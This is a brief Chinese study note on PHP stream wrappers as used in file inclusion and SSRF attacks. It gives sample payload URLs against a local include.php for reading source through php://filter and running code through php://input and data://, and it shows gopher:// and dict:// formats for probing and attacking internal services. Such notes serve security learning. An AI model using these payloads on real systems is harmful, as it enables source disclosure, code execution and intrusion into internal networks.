PHP伪协议
使用的语句:
-
file://:访问本地系统,读取本地文件。
条件:allow_url_fopen:off/on,allow_url_include:off/on
-
php://filter:读取文件源码(针对php文件需要base64编码)。
条件:allow_url_fopen:off/on,allow_url_include:off/on
用法:
php://filter/read=convert.base64-encode/resource=[文件名]
ep:
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
-
php://input:执行php代码。
条件:allow_url_fopen:on,allow_url_include:on
用法:
php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?> -
data://:自 PHP>=5.2.0 起,可以使用 data:// 数据流封装器,以传递相应格式的数据。通常可以用来执行 php 代码。
条件:allow_url_fopen:on,allow_url_include:on
用法:
data://text/plain,
data://text/plain;base64,示例:
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
-
dict://:探测端口的开放情况和指纹信息。
使用方法:
dict://serverip:port/命令:参数
-
gopher://:攻击内网的 FTP、Telnet、Redis、Memcache等服务,也可以进行 GET、POST 请求。
基本格式:
?url=gopher://<host>:<port>/<gopher-path>_后接TCP数据流
OK先到这,明天开始细致学习实践和gopher